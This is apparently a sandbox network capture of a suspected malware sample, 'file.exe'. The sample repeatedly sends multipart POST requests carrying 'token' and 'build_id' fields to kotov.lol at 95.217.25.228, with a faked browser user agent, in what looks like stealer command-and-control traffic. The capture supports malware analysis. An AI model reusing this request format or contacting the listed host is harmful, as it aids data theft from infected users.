2024-11-29 11:28:27 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	49852	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:28 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:28 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GHCAAAAKJJDAKECBGIJECont
2024-11-29 11:28:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	49853	95.217.25.228	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:29 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:29 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 42 47 44 47 48 49 49 4a 4a 4b 45 42 4b 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------KEBFBGDGHIIJJKEBKJDBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------KEBFBGDGHIIJJKEBKJDBCont
2024-11-29 11:28:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	49854	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:31 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:31 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BGDBAKFCFHCGDGCBAAKFCont
2024-11-29 11:28:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	49855	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:32 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKEHJEGCFCAKFIIJJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:32 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GHJKEHJEGCFCAKFIIJJJCont
2024-11-29 11:28:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	49856	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:34 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:34 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FIEHDBGDHDAECBGDHJKFCont
2024-11-29 11:28:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	49857	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:35 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:35 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IIDHJKFBGIIJJKFIJDBGCont
2024-11-29 11:28:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	49858	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:37 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:37 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BKECAEBGHDAEBFHIEGHICont
2024-11-29 11:28:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	49859	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:38 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:38 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FBAFIIJKJEGIDGDGIIDHCont
2024-11-29 11:28:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	49860	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:40 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:40 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------JKEGHDGHCGHDHJKFBFBKCont
2024-11-29 11:28:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	49861	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:41 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:41 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GCBKFIEBGCAAFIEBFCAECont
2024-11-29 11:28:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	49862	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:43 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:43 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IDHDGIEHJJJJEBGDAFHJCont
2024-11-29 11:28:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	49863	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:45 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
